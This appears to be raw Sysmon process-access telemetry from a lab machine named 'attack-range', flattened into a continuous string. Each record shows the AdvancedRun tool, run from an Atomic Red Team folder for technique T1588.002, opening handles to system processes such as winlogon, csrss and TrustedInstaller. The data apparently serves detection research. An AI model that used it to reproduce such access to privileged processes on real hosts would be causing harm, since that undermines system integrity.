17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983977Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983975Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983973Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983972Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983971Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 